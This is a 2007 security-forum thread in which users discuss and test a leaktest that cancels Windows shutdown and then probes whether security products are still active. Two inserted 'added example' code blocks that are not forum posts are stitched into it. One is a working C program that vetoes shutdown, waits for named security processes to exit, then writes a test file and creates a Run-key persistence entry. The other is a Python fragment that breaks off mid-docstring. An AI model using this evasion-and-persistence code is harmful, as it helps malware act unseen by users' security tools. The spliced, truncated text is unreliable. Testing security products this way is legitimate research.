New Leaktest / Security Tool Released - System Shutdown Simulator
dmenace
November 20th, 2007, 05:48 PM
Dear Wilders Community,
As mentioned before I have discovered a simple design issue in Windows that can circumvent the protection of some security software today.
This security tool / leaktest is called System Shutdown Simulator (self-explanatory). It is available for download here:
http://www.geocities.com/zeroday_software/
This leaktest highlights a new vulnerability that exists when a user shuts down their computer and a program cancels the shutdown. For example, when installing new software, the installation program often asks the user to restart their computer to complete the installation. When the user allows the computer to be restarted, the installation program could potentially compromise the user's computer completely undetected by security software, as these have already shut down.
A selection of security vendors were notified on 12/11/07 (list kindly supplied by gkweb of firewallleaktester.com). SySafety, however, was contacted earlier, on 10/11/07.
A response has been received from SoftSphere Technologies (DefenseWall HIPS), SySafety (SSM) and Tall Emu (Online Armor).
If you have any issues please contact me at: zeroday_software@yahoo.com
The latest release is 1.0.20
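The technique the post describes, as an added example (my code, not the SSS sources, which are not on this page): the program vetoes the user's shutdown from WM_QUERYENDSESSION, waits until the security product's GUI/tray processes have exited, and only then performs two of the three SSS step-3 actions (writing the EICAR test file and creating an HKCU Run value; the ICMP check is left out). The process names in WATCH are placeholders I assumed for the demo, not real product names, and the "gone after 60 s" timeout is also an assumption.

```c
/* sss_demo.c: shutdown-cancel demonstrator. Added example, not the SSS
 * code. Vetoes the user's shutdown, waits until the watched (hypothetical)
 * security processes have exited, then does two of the SSS step-3 actions.
 * Build with MinGW: gcc -o sss_demo.exe sss_demo.c -ladvapi32
 * On a non-Windows host only the portable decision helper is built. */
#undef UNICODE                      /* keep the ANSI Toolhelp structures */
#include <stdio.h>
#include <string.h>

/* Standard EICAR test string: harmless, but every AV should react to it. */
static const char EICAR[] =
    "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*";

/* Assumed (placeholder) image names of the security GUI/tray components to wait for. */
static const char *WATCH[] = { "hipsgui.exe", "fwtray.exe" };
static const size_t NWATCH = sizeof WATCH / sizeof WATCH[0];

/* Case-insensitive ASCII equality; image names on Windows are case-insensitive. */
static int ieq(const char *a, const char *b) {
    for (; *a && *b; a++, b++) {
        int ca = (unsigned char)*a, cb = (unsigned char)*b;
        if (ca >= 'A' && ca <= 'Z') ca += 'a' - 'A';
        if (cb >= 'A' && cb <= 'Z') cb += 'a' - 'A';
        if (ca != cb) return 0;
    }
    return *a == *b;
}

/* Portable core of the "are we unprotected yet?" decision: how many watched
 * names are still present in a snapshot of running image names. 0 = all gone. */
int watched_still_running(const char **running, size_t n,
                          const char **watch, size_t m) {
    int live = 0;
    for (size_t i = 0; i < m; i++)
        for (size_t j = 0; j < n; j++)
            if (ieq(watch[i], running[j])) { live++; break; }
    return live;
}

#ifdef _WIN32
#include <windows.h>
#include <tlhelp32.h>

static volatile int g_shutdown_seen = 0;

/* Take a Toolhelp snapshot and count watched processes still alive. */
static int count_watched_live(void) {
    static char bufs[1024][MAX_PATH];
    const char *names[1024];
    size_t n = 0;
    PROCESSENTRY32 pe = { sizeof pe };
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snap != INVALID_HANDLE_VALUE) {
        if (Process32First(snap, &pe)) do {
            if (n == 1024) break;
            strncpy(bufs[n], pe.szExeFile, MAX_PATH - 1);
            bufs[n][MAX_PATH - 1] = '\0';
            names[n] = bufs[n];
            n++;
        } while (Process32Next(snap, &pe));
        CloseHandle(snap);
    }
    return watched_still_running(names, n, WATCH, NWATCH);
}

/* SSS step 3: actions a HIPS/AV that is still alive should catch. */
static void run_checks(void) {
    FILE *f = fopen("eicar.com", "wb");
    int wrote = f != NULL;
    if (f) { fwrite(EICAR, 1, sizeof EICAR - 1, f); fclose(f); }
    printf("EICAR write: %s\n", wrote ? "succeeded (no on-write block)" : "blocked");

    char me[MAX_PATH];
    HKEY k;
    GetModuleFileNameA(NULL, me, MAX_PATH);
    LONG r = RegCreateKeyExA(HKEY_CURRENT_USER,
        "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
        0, NULL, 0, KEY_SET_VALUE, NULL, &k, NULL);
    if (r == ERROR_SUCCESS) {
        r = RegSetValueExA(k, "SSS-demo", 0, REG_SZ,
                           (const BYTE *)me, (DWORD)strlen(me) + 1);
        RegCloseKey(k);
    }
    printf("Run value: %s\n", r == ERROR_SUCCESS ? "created (HIPS FAILED)" : "blocked (pass)");
}

/* Returning FALSE to WM_QUERYENDSESSION vetoes the shutdown. */
static LRESULT CALLBACK wndproc(HWND h, UINT m, WPARAM w, LPARAM l) {
    if (m == WM_QUERYENDSESSION) { g_shutdown_seen = 1; return FALSE; }
    return DefWindowProcA(h, m, w, l);
}

int main(void) {
    WNDCLASSA wc = { 0 };
    wc.lpfnWndProc = wndproc;
    wc.hInstance = GetModuleHandleA(NULL);
    wc.lpszClassName = "SssDemoWnd";
    RegisterClassA(&wc);
    /* A hidden top-level window (not a message-only one) receives the broadcast. */
    CreateWindowExA(0, wc.lpszClassName, "", 0, 0, 0, 0, 0, NULL, NULL, wc.hInstance, NULL);
    printf("Armed. Shut down from the Start menu now.\n");
    MSG msg;
    while (GetMessageA(&msg, NULL, 0, 0) > 0) {
        DispatchMessageA(&msg);
        if (!g_shutdown_seen) continue;
        /* Poll until every watched process is gone, giving up after 60 s. */
        for (int tries = 0; count_watched_live() > 0 && tries < 60; tries++) Sleep(1000);
        run_checks();
        return 0;
    }
    return 0;
}
#else
int main(void) {                     /* constructed snapshot for a non-Windows build */
    const char *snapshot[] = { "explorer.exe", "HIPSGUI.EXE" };
    printf("watched still running: %d\n", watched_still_running(snapshot, 2, WATCH, NWATCH));
    return 0;
}
#endif
```

Two details matter for reproducing what the thread reports: the window must be a real (hidden) top-level window, because message-only windows do not receive the WM_QUERYENDSESSION broadcast, and the payload must be gated on the process snapshot rather than on a fixed delay, since the wait between the veto and the last tray icon disappearing varies from machine to machine. Remove eicar.com and the SSS-demo Run value afterwards.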
EASTER
November 20th, 2007, 11:20 PM
I don't suppose your tool has been submitted to EQSecurity yet. It sure would do them some good to review their HIPS's vulnerability to it so that they might make the necessary adjustments to protect against it.
Thanks for your interest and research in this.
dmenace
November 21st, 2007, 12:02 AM
No, haven't notified EQSecurity. :-\
Does anyone know their email address?
alfa1
November 21st, 2007, 09:27 AM
my mistake....
i misunderstood the leaktest!
ggf31416
November 21st, 2007, 11:00 AM
alfa1, I think you are supposed to shut down manually from the Start menu, not click the shutdown button in the leaktest.
Old Monk
November 21st, 2007, 11:20 AM
-{ Quote: "alfa1, I think you are suposed to shutdown manually from the start menu, not click the shutdown button in the leaktest." }-
I had it as an either/or :-\
For those interested, SafeSpace passes the Auto Start Registry Key test when the SSS is run in SafeSpace. Well, thats how I'm reading it :)
alfa1
November 21st, 2007, 11:55 AM
-{ Quote: "alfa1, I think you are suposed to shutdown manually from the start menu, not click the shutdown button in the leaktest." }-
you are wrong...
EDIT:
sorry again...
ggf31416
November 21st, 2007, 11:57 AM
-{ Quote: "I had it as an either/or :-\" }-
The window says "or". However, I think that checking whether your security can intercept a shutdown is not the idea. The idea is to check that your security doesn't close too early during a shutdown, leaving the computer unprotected against any application that can cancel the shutdown and deliver a malicious payload.
From SSS:
-{ Quote: "Note: While security programs can detect if an application tries to shut down a computer, in reality, malware could wait for the user to shut down the computer before running a malicious payload to avoid detection." }-
aigle
November 21st, 2007, 11:58 AM
-{ Quote: "195312
195313
ProSecurity 1.40b2" }-
alfa1, you did not understand the test. You need to allow the shutdown and then use step 3 to test your HIPS (PS).
Old Monk
November 21st, 2007, 11:58 AM
-{ Quote: "you are wrong..." }-
he/she isn't wrong exactly ....it is either/or :)
aigle
November 21st, 2007, 11:59 AM
-{ Quote: "alfa1, I think you are suposed to shutdown manually from the start menu, not click the shutdown button in the leaktest." }-
It can be either way, but you need to allow the shutdown prompt from your HIPS to use the actual leaktest (Step 3).
alfa1
November 21st, 2007, 12:06 PM
ok, i'm very sorry for my mistake...
I'll try again...:thumbd:
aigle
November 21st, 2007, 12:07 PM
Very smart leaktest indeed.:thumb: :thumb: :thumb:
I tested my system:
1- GesWall - Passed - Eicar test file was isolated and autostart reg entry was virtualized. :thumb:
2- NeovaGuard - Intercepted autostart reg entry creation (I got a skinless prompt as the GUI was already terminated). Passed :thumb:
NG however did not intercept the outbound ping, as I think its network monitoring component has no such filter. Also NG has no file protection, so it's not supposed to intercept Eicar test file creation.
3- EQSecure - totally failed. It intercepted creation of neither the Eicar test file nor the autostart reg entry. :thumbd:
I did not check Antivir as I am not using it in real time, may try later.
aigle
November 21st, 2007, 12:10 PM
-{ Quote: "ok, i'm very sorry for my mistake...
I'll try again...:thumbd:" }-
No problems. Test is really confusing and tricky:) but very nice indeed.
zopzop
November 21st, 2007, 12:15 PM
@aigle
you are using geswall 2.7 beta right? did you try it vs the shutdown attempt. because i still use 2.6 and it failed the shutdown part of the test.
edit : geswall stops the machine from being restarted BUT all the program icons near the system clock disappear. even with them gone, geswall still stopped the program from creating a registry entry and the eicar file was indeed created isolated. i just don't get where my icons went ;)
alfa1
November 21st, 2007, 12:19 PM
ok....
now i can show you the last pic (sorry again....):
195320
aigle
November 21st, 2007, 12:26 PM
zopzop! I am using 2.7 beta. The test is not about shutdown, indeed. The test doesn't even shut down your system completely. It just shuts down the system to the extent that all security software is turned off (Steps 1 and 2). It's at that time that the leaktest simulates some malicious actions (Step 3).
The Step 2 shutdown is not the real test. That's my understanding of the test.
Indeed, if some HIPS somehow will not allow Step 2 (partial system shutdown), there is no way to test that HIPS against this leaktest. Correct me if I am wrong.
aigle
November 21st, 2007, 12:28 PM
-{ Quote: "ok....
now i can show you the last pic (sorry again....):
195320" }-
What about file creation and outbound ping? PS has file protection and network access modules as I know.
Old Monk
November 21st, 2007, 12:29 PM
-{ Quote: "@aigle
you are using geswall 2.7 beta right? did you try it vs the shutdown attempt. because i still use 2.6 and it failed the shutdown part of the test.
edit : geswall stops the machine from being restarted BUT all the program icons near the system clock disappear. even with them gone, geswall still stopped the program from creating a registry entry and the eicar file was indeed created isolated. i just don't get where my icons went ;)" }-
Hi zopzop
The tray icons disappearing are part of the test as I understand it.
Like a fake shutdown but in reality it should close the GUI and you should see the service running in Task Manager.
This I can confirm with Online Armor and SafeSpace. You will find Returnil shut down completely but no major issue as it will reboot with no changes assuming you were in Session Lock.
Need to check again now I can find Eicar file whether it is in fact running in SafeSpace.
alfa1
November 21st, 2007, 12:42 PM
-{ Quote: "What about file creation and outbound ping? PS has file protection and network access modules as I know." }-
195324
195325
zopzop
November 21st, 2007, 12:45 PM
-{ Quote: "zopzop! I am using 2.7 beta. The test is not about shutdown, indeed. The test doesn't even shut down your system completely. It just shuts down the system to the extent that all security software is turned off (Steps 1 and 2). It's at that time that the leaktest simulates some malicious actions (Step 3).
The Step 2 shutdown is not the real test. That's my understanding of the test.
Indeed, if some HIPS somehow will not allow Step 2 (partial system shutdown), there is no way to test that HIPS against this leaktest. Correct me if I am wrong." }-
ah i get it now :) then i can confirm geswall 2.6 passes this test, since the registry entry was virtualized and eicar file was isolated.
aigle
November 21st, 2007, 12:47 PM
Anyone tried:
DefenseWall
ThreatFire
aigle
November 21st, 2007, 12:53 PM
-{ Quote: "195324
195325" }-
Thanks
Old Monk
November 21st, 2007, 12:58 PM
Hi
Like GesWall, SafeSpace isolates the Eicar file when SSS is run in SafeSpace, so I guess that's a pass as well :thumb:
gkweb
November 21st, 2007, 02:26 PM
Hello,
I'm mirroring the file, with dmenace's agreement :
http://www.firewallleaktester.com/mirror/zeroday_software/sss.htm
Regards,
gkweb.
Peter2150
November 21st, 2007, 03:17 PM
Has anyone tested Sandboxie??
Franklin
November 21st, 2007, 03:35 PM
Running sandboxed within Vista.
Eicar and Autostart creation both state "successful - fail" and are contained to the sandbox.
Shutdown test is unsuccessful with sandboxie showing the below top message.
The ping test seems unsuccessful in Sandboxie/Vista but seems to get through with Sandboxie/XP when SB is configured to stop outbounds.
195330
Error message when attempting the ping test SB/Vista.
195331
Quote a fellow poster, Mitch, over at SB's forum on the ping test in XP.
I'm just not quite sure on this test though - I pinged myself, I pinged no address and I pinged xxx.xx.xx.xx and each time it said I failed. Hmmm....
Cerxes
November 21st, 2007, 03:55 PM
@Denis: Well-designed exploit/leak test (& for adding another attack vector for the script-kiddies... ;D.)
Anti-Executable (2.20.0255): Passed (So it won't work as a runtime executable.)
Eicar-test:
Online Armor (2.1.0.31): Passed (Showing an Allow/Block prompt when trying both write and execute.)
Avast (4.7.1074): Failed
AVG AS (7.5.1.43): Failed
Autostart-test:
Online Armor (2.1.0.31): Passed
DefenseWall (2.09): Passed
ThreatFire (3.0.8 ): Failed
WinPatrol (12.2.2007): Failed (Intercepted the autostart change after reboot, but then it would be too late.)
Limited User Account: Failed (Its purpose isn't to prevent programs from running/autostarting; its purpose is to prevent malware from doing too much harm without an extra privilege elevation. But if you don't want the user-specific autorun entry, you can disable it either directly in the registry editor or by group policy.)
Leak-test:
Didn´t run this test since I don´t use an outbound filter.
-{ Quote: "...When it comes to security, there’s no single cure all and every layer of protection you add could be the one that eventually saves you or your computer. (Mark Russinovich, Sysinternals.com/Blog)" }-
/C.
Stephen2_Aus
November 21st, 2007, 04:48 PM
A beautiful piece of work by the designer...
Using Windows XP SP2, here's my findings:
1) Eicar creation: Kaspersky Anti Virus 7 - Failed to detect
2) Autorun key creation: EITHER ProSecurity 1.4PB2 blocked it, OR Limited User Account blocked it. I'm inclined to think Limited User Account because ProSecurity failed test 3
3) Ping-test:
Outpost 4 (Latest build): failed (hmm, 30 mins later and not at my computer, I'm thinking maybe I've globally allowed pings out with Outpost). ProSecurity 1.4PB2 failed.
Damn, how demoralizing....:lurking:
Franklin
November 21st, 2007, 04:55 PM
-{ Quote: "A beautiful piece of work by the designer..." }-
So why and or where is it pinging if you leave the address field blank????
Stephen2_Aus
November 21st, 2007, 05:19 PM
-{ Quote: "So why and or where is it pinging if you leave the address field blank????" }-
Sorry Franklin, you lost me?
I left the ping field with the default IP SSS.exe uses... It said it got a response no problem.
What I meant above was that I think I have allowed any program to ping anywhere in my firewall setup, so I don't think I really tested Outpost 4 properly.
Still, maybe I did and it doesn't block all network activity during shutdown.
dmenace
November 21st, 2007, 05:22 PM
-{ Quote: "So why and or where is it pinging if you leave the address field blank????" }-
Sorry Franklin, Thats a bug that I'll fix in Version 1.21. Because this is a one-man operation, I haven't had the time to do extensive testing. :(
-{ Quote: "A beautiful piece of work by the designer..." }-
Thanks Stephen, its good to know that its useful... :)
To clarify on the shutdown question earlier, you should shutdown your computer manually from the start menu. The shutdown button has been left there for convenience but like I said your HIPS would probably detect that...
-{ Quote: "Hello,
I'm mirroring the file, with dmenace's agreement :
http://www.firewallleaktester.com/mi...ftware/sss.htm
Regards,
gkweb." }-
Thanks gkweb for all your time and help :thumb: :thumb: :thumb: :thumb: :thumb:
dmenace
November 21st, 2007, 05:42 PM
-{ Quote: "Error message when attempting the ping test SB/Vista.
Quote a fellow poster over at SB's forum on the ping test in XP.
I'm just not quite sure on this test though - I pinged myself, I pinged no address and I pinged xxx.xx.xx.xx and each time it said I failed. Hmmm..." }-
Franklin, sorry for the confusion. :ouch:
By default SSS is configured to ping www.yahoo.com
If you ping yourself, (127.0.0.1) it will probably succeed (ie it will say firewall fails). This is ok, and not a fault of the firewall as loopback connections are not accessible to outsiders and thus usually allowed by firewalls (Correct me if I'm wrong)
If you ping another IP address like the default one, and it fails then you have a problem.
I haven't tested this in Vista so it'll be hard to replicate that error message. If the firewall test component doesn't work in Sandboxie, I'll try to contact Tzuk. Otherwise I'll have to rewrite SSS to not use pings and instead send a TCP packet. :wacko:
Does anyone know eqsecure's email?
Franklin
November 21st, 2007, 06:21 PM
Thanks for the reply dmenace.:)
aigle
November 21st, 2007, 06:22 PM
-{ Quote: "Does anyone know eqsecure's email?" }-
support[at]eqsecure.com
But I never got a reply from them. Solcroft can help you convey your message to them.
aigle
November 21st, 2007, 06:24 PM
-{ Quote: "Shutdown test is unsuccessful with sandboxie showing the below top message." }-
Seems somehow you misunderstood it. There is no shutdown test. While testing any sandbox, you must use the normal shutdown button instead of shutdown via the leaktest. The system will be shut down partially; then try Step 3, which is the actual leaktest, and see the results.
Franklin
November 21st, 2007, 06:31 PM
dmenace, if you have time you may want to visit the link below.
http://www.sandboxie.com/phpbb/viewtopic.php?t=2443
@ aigle, will give it another run.
Franklin
November 21st, 2007, 06:38 PM
Yep, the test did prevent Vista from shutting down!
The app has to be left running in order for this to happen with Sandboxie showing there is an active process still running if hidden.
ggf31416
November 21st, 2007, 07:27 PM
A suggestion for the next version: replace the ping test with TCP. For example, download some harmless text file or upload some text written by the user.
Currently the leaktest is not only testing whether the firewall is working or not but also the ability of the firewall to block outbound pings with the current rules. Many firewalls (e.g. Kerio 2.15) don't allow application rules for ICMP, only global rules.
Eh_Greg
November 21st, 2007, 07:28 PM
-{ Quote: "Seems somehow u misunderstood it. There is no shutdown test. While testing any sandbox, u must use normal shutdown button instead of shutdown via leaktest. System will be shutdown partially, then try step 3 that is actual leak test and see the results." }-
The creator of this should explain things a lot more clearly before people start calling this such a great test, instead of just throwing a post about it on other forums... only causing confusion, and not just for me, obviously.
boonie
November 21st, 2007, 07:45 PM
It seems pretty straightforward. I've made a few pics to confirm I'm running it correctly and to help anyone who may be confused.
First step: Open SSS and click on "Intercept System shutdown call".
195332
Second Step: Shutdown/Restart PC through Start menu (avoiding any interception of the Shutdown command by a HIPS program)
195333
195334
195335
After this is done the GUIs of your programs will shutdown, and Systray icons will disappear.
195336
Whether their services are running, and whether they will be effective, remains to be seen.
Will continue.
boonie
November 21st, 2007, 07:49 PM
Step three: Run the tests (Eicar, Auto Start Registry Key, Outbound Connection) and check results
195337
195338
195339
Pass or fail, you can now clean up the Eicar and registry entries (if the Reg test ended in a fail) and close SSS
195342
195341
Then just restart your PC.
So, is that it? Hope this can help.
Cerxes
November 21st, 2007, 07:59 PM
@boonie: Which security programs did you test?
Edit: Sorry, missed the programs in your sig.
/C.
boonie
November 21st, 2007, 08:00 PM
NOD32 and Online Armor (Paid)
Should be noted that I have Allow Echo Request in OA's firewall unchecked (default is allow).
Eh_Greg
November 21st, 2007, 08:14 PM
OK. I had done it correctly for the apps I had on at the time... I think. Avira antivirus passed without any other protection. While I had Comodo 3 on, I'm pretty sure it passed the firewall part even with a global rule, as long as you don't give all permissions to this app. Blows by Windows Firewall (XP) only to be stopped by el cheapo router. This ICMP going out from the router is totally unnecessary to be enabled, right? Haven't looked at other apps yet.
dmenace
November 21st, 2007, 08:52 PM
-{ Quote: "The creator of this should explain things alot more clearly before people start calling this such a great test. instead of just throwing a post about it on other forums... Only causing confusion and not just by me obviously." }-
My apologies to Eh_Greg and anyone else who is confused.
Big thanks to Boonie for their excellent explanation. It is a completely correct understanding. The actual test is at step 3 where you can see if you pass/fail.
I've released 1.0.21 to fix a possible bug with the ping results.
Eh_Greg
November 22nd, 2007, 12:40 AM
-{ Quote: "NOD32 and Online Armor (Paid)
Should be noted that I have Allow Echo Request in OA's firewall unchecked (default is allow)." }-
Good to see those passed. The confusion wasn't really how to run the test on this end. Was just the apps I was looking at during testing, and some Sandboxie confusion it seemed. SSS seemed to hang a couple times and took about a minute to clear the systray.
Greg
Franklin
November 22nd, 2007, 03:32 AM
Quote Tzuk, the author of Sandboxie:
-{ Quote: "Furthermore running PING in a sandboxed command prompt in a sandbox where only IEXPLORE is allowed to use the Internet also works. Finally, running a Sandboxie trace during PING reveals that no access is made to any of those Afd/Tcp/Udp/RawIp resources.
Even if the SSS process gets a chance to do something during shutdown, it's still trapped in the sandbox. The Sandboxie driver does not stop monitoring processes during shutdown processing." }-
MitchE323
November 22nd, 2007, 02:01 PM
Hello everyone, thought I would register and say Happy Thanksgiving to everybody since Franklin mentioned a thread over at SandboxIE that coincides with this thread. Very interesting program indeed dmenace, keep up the good work. Anyone that hasn't visited SandboxIE as yet are of course very welcome, it's a pretty fun setup over there. (I'm not connected in any way, just a frequent poster). I'll lurk around a little bit here and see what I can learn. I am of the 'less is more' philosophy when it comes to computer security, but there is merit in many different approaches. Anyway, hope everyone stays happy and safe this holiday. C ya.
mitche323
gkweb
November 22nd, 2007, 03:49 PM
Hello,
-{ Quote: "Thanks gkweb for all your time and help :thumb: :thumb: :thumb: :thumb: :thumb:" }-
You are welcome :) Thanks to you for your great tool ;)
Regards,
gkweb.
aigle
November 22nd, 2007, 04:26 PM
Has anyone tried Comodo v3 against it?
Thanks
Yoda1953
November 22nd, 2007, 06:06 PM
Good old Sygate :o and Avira free passed. ThreatFire did nothing. Got no other HIPS.
Cheers.
19monty64
November 22nd, 2007, 07:11 PM
-{ Quote: "Hello everyone, thought I would register and say Happy Thanksgiving to everybody since Franklin mentioned a thread over at SandboxIE that coincides with this thread. Very interesting program indeed dmenace, keep up the good work. Anyone that hasn't visited SandboxIE as yet are of course very welcome, it's a pretty fun setup over there. (I'm not connected in any way, just a frequent poster). I'll lurk around a little bit here and see what I can learn. I am of the 'less is more' philosophy when it comes to computer security, but there is merit in many different approaches. Anyway, hope everyone stays happy and safe this holiday. C ya.
mitche323" }-
Hi MitchE323, and welcome to the forum. Try the "search" function if there's anything particular you're looking for. Quite a few SandboxIE threads (and fans) here
Terror_Eyez
November 22nd, 2007, 07:29 PM
-{ Quote: "Hello everyone, thought I would register and say Happy Thanksgiving to everybody since Franklin mentioned a thread over at SandboxIE that coincides with this thread. Very interesting program indeed dmenace, keep up the good work. Anyone that hasn't visited SandboxIE as yet are of course very welcome, it's a pretty fun setup over there. (I'm not connected in any way, just a frequent poster). I'll lurk around a little bit here and see what I can learn. I am of the 'less is more' philosophy when it comes to computer security, but there is merit in many different approaches. Anyway, hope everyone stays happy and safe this holiday. C ya.
mitche323" }-
Hey right back at ya man, i've seen you over at Sandboxie before and now I run into you again, over here!:P
Anyways though, Happy Thanksgiving to everyone else as well!
Franklin
November 22nd, 2007, 10:04 PM
-{ Quote: "Hello everyone, thought I would register and say Happy Thanksgiving to everybody since Franklin mentioned a thread over at SandboxIE that coincides with this thread. Very interesting program indeed dmenace, keep up the good work. Anyone that hasn't visited SandboxIE as yet are of course very welcome, it's a pretty fun setup over there. (I'm not connected in any way, just a frequent poster). I'll lurk around a little bit here and see what I can learn. I am of the 'less is more' philosophy when it comes to computer security, but there is merit in many different approaches. Anyway, hope everyone stays happy and safe this holiday. C ya.
mitche323" }-
Hi Mitch and welcome to Wilders.;)
Have picked up many good tips on Sandboxie from MitchE323 over at SB's forum.:thumb:
dmenace
November 23rd, 2007, 03:45 AM
Hello,
Interesting to see all the responses!
Regarding the results of SSS, when I released it I expected most software to pass and only some poorly written software to fail.
However what surprised me was that software like Avast AV, System Safety Monitor, Eqsecure, KIS 7 and Comodo 3 RC1 (Not current release) all FAILED!
I've also released the new version as mentioned (1.0.21) that fixes an issue with the ping results being misleading in some cases.
Regarding Sandboxie, it isn't a firewall so you can't expect it to block the outgoing ping. Sandboxie does isolate the eicar file and auto start key so it passes as a sandbox. :thumb:
Version 1.1 should hopefully use TCP instead of ping for more accurate results.
vlk
November 23rd, 2007, 04:23 AM
-{ Quote: "However what surprised me was that software like Avast AV..[snip] all FAILED!" }-
That's an invalid assumption, as a matter of fact.
Cerxes
November 23rd, 2007, 04:42 AM
No, it's not an invalid assumption, since it was me that tested it, and I followed the instructions accordingly. Test it yourself then if you think I've done it wrongly.
/C.
dmenace
November 23rd, 2007, 05:14 AM
Actually, I've tested avast in a virtual machine too and it failed.
However I haven't / wont do anymore testing. Other results above supplied kindly by gkweb and others.
MitchE323
November 23rd, 2007, 05:53 AM
dmenace, Forgive me as I am slightly late to the party here and I am trying to get a handle on the entire concept of your program. In your opening post you state that "this leaktest highlights a new vulnerability that exists when a user shuts down their computer and a program cancels the shutdown." So if I've got it right, you shut down your computer and all of your running processes begin to close. Some or all of your security programs are shutting down. During this time, another program cancels that shutdown (to Windows only), and one by one all of your running processes completely close. Now you are completely exposed to anything that program wants to do on your computer. Also I imagine that all of this could probably be setup as to happen almost instantly so you would never even notice it. That's a remarkable discovery on your part.
It occurs to me that a completely valid question to any supplier of any security product would be; "Does your program stop monitoring at any time during the shutdown process?" If it does, it is potentially vulnerable. Tzuk has stated over at SandboxIE that his program does not stop monitoring during the shutdown process. It seems an easy enough question for the developer to simply answer.
This could almost become a new 'Standard Question' to ask of any security product you are considering. Then, your program kicks in to verify that all are being correct in their answers.
It seems to me, to be more thorough than one by one actually testing programs because in fact the same program might pass or fail depending on whether or not your test was implemented by the user before or after the security program closed. One user might wait 10 seconds before proceeding to step 3 of your test and another might wait 10 minutes. Also in the test the user is controlling the action (via your test) when in reality, it would be a piece of malware that was determining when to issue the 'Cancel Shutdown' order and when to issue the 'Destroy Computer' order.
You are bound to get a bunch of "it failed", "no it didn't", "well, it failed for me too" responses here. The important thing about all of this is that a user whose products passed would be lulled into a false sense of security when in fact his results were part of a random mix.
mitche323
vlk
November 23rd, 2007, 06:06 AM
-{ Quote: "No, it´s not an invalid assumption since it was me that tested it, and I followed the instructions accordingly. Test it yourself then if you think I´ve done it wrongly." }-
-{ Quote: "Actually, I've tested avast in a virtual machine too and it failed." }-
I'm not saying the program says it PASSES, but I'm saying that assuming that this means there's some kind of bypass is incorrect.
Let me explain what's going on. The program (SSS) doesn't actually try to execute the file (eicar), all it does is write the file to the hard drive. Now, it all depends on your avast configuration. By default, when avast finds a virus on-write, it only notifies the user (doesn't delete the file automatically). Since its GUI component is already killed, it doesn't display the popup and nothing really happens. However, no malicious code is executed, of course. You can try running the eicar, you'll see that it will be blocked.
Also, if you're not happy with that behavior, you can change it. In the Standard Shield's settings, just enable Silent Mode (-> with answer "No") and this will cause all malware samples written to the hard drive to be automatically moved to the quarantine.
Cheers
Vlk
aigle
November 23rd, 2007, 06:27 AM
Nice to know that Avast doesn't fail in reality.
dmenace! I think it will be nice to add execution of the Eicar test file as well to the leaktests.
dmenace
November 23rd, 2007, 06:30 AM
-{ Quote: "dmenace, Forgive me as I am slightly late to the party here and I am trying to get a handle on the entire concept of your program. " }-
No worries. A long read I guess...
-{ Quote: "In your opening post you state that "this leaktest highlights a new vulnerability that exists when a user shuts down their computer and a program cancels the shutdown." So if I've got it right, you shut down your computer and all of your running processes begin to close. Some or all of your security programs are shutting down. During this time, another program cancels that shutdown (to Windows only), and one by one all of your running processes completely close. " }-
Not all the processes close. If the process is running at a kernel-level with a driver it should still work even without a GUI.
-{ Quote: "It occurs to me that a completely valid question to any supplier of any security product would be; "Does your program stop monitoring at any time during the shutdown process?" If it does, it is potentially vulnerable.
This could almost become a new 'Standard Question' to ask of any security product you are considering. Then, your program kicks in to verify that all are being correct in their answers. " }-
Yes, you could ask that question. However, obviously every security product has to shut down eventually, so it's incorrect to ask "at any time". Maybe ask "while Windows is shutting down / booting".
Software firewall vendors are usually most asked this question.
-{ Quote: "It seems to me, to be more thorough than one by one actually testing programs because in fact the same program might pass or fail depending on whether or not your test was implemented by the user before or after the security program closed. One user might wait 10 seconds before proceeding to step 3 of your test and another might wait 10 minutes. Also in the test the user is controlling the action (via your test) when in reality, it would be a piece of malware that was determining when to issue the 'Cancel Shutdown' order and when to issue the 'Destroy Computer' order." }-
Yes I understand there is this time issue that may affect results. Usually I just wait till all the tray icons vanish when I run the test.
In reality, the "cancel shutdown" would work straight away when test is run as it hooks the windows api. Then when the user shuts down the computer this would be detected. A malicious payload would be executed when for example, it detects that certain processes have shutdown or only windows processes remain.
-{ Quote: "You are bound to get a bunch of "it failed", "no it didn't", "well, it failed for me too" responses here. The important thing about all of this is that a user whose products passed would be lulled into a false sense of security when in fact his results were part of a random mix.
mitche323" }-
Yes I agree there could be a false sense of security. So I would have to point that out more - that you have to wait. I suggest if you are confused simply repeat the test (step 3) again after say a minute.
Phew! :wacko: No more questions! :ouch: :D
BTW welcome to wilders mitch.
EDIT: So it makes sense
dmenace
November 23rd, 2007, 06:48 AM
-{ Quote: "dmenace! I think it will be nice to add execution of the Eicar test file as well to the leaktests." }-
Easy for you to say, but this is a one-man operation... with no rewards (i.e. freeware), so obviously I can't do everything:
1) how to detect if eicar successfully executed???
>>> have to scan running processes ughh!
Sorry I shouldn't be complaining and I'll do what I can. But geez I am a bit overwhelmed ~ its a leaktest not a security app. :( :gack: :gack: :gack:
The concept is there. You can always run your own payload.
Edited
MitchE323
November 23rd, 2007, 06:52 AM
Spot on dmenace! Thanx for the totally informative and quick answer - I'm caught up now. lol :D
aigle
November 23rd, 2007, 06:54 AM
-{ Quote: "Easy for you to say, but this is a one-man operation... with no rewards (i.e. freeware), so obviously I can't do everything:" }-
I agree.
-{ Quote: "Sorry I shouldn't be complaining and I'll do what I can. But geez I am a bit overwhelmed ~ its a leaktest not a security app. :( :gack: :gack: :gack:" }-
I can understand your situation. Take it easy. You are not bound to do anything. It's still a smart leaktest as it is.;D
MitchE323
November 23rd, 2007, 07:14 AM
-{ Quote: "It's still a smart leaktest as it is.;D" }-
I agree, and it's still beta! Looks like a good candidate for 'DonationWare'
vlk
November 23rd, 2007, 07:28 AM
-{ Quote: "1) how to detect if EICAR successfully executed
>>> have to scan running processes ughh!" }-
All you have to do is check whether the process creation API succeeded or failed (usually, it fails with Access Denied error code if an AV is blocking the file).
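Added example (not code from the thread or from the SSS tool): the launch-result check vlk describes, written in Python so it runs anywhere, with the file states as constructed stand-ins. It also separates the case vlk's "usually" hides: an on-access scanner that removes the file before launch shows up as file-not-found rather than Access Denied.

```python
import os
import subprocess
import tempfile

# Outcome labels for one launch attempt of the test file.
EXECUTED = "executed"
ACCESS_DENIED = "access_denied"
MISSING = "missing"


def classify_launch(path):
    """Launch `path` once and classify the result from the process-creation
    API's return value instead of scanning the process list afterwards.
    A blocking AV typically makes process creation fail with Access Denied,
    which Python surfaces as PermissionError; a scanner that has already
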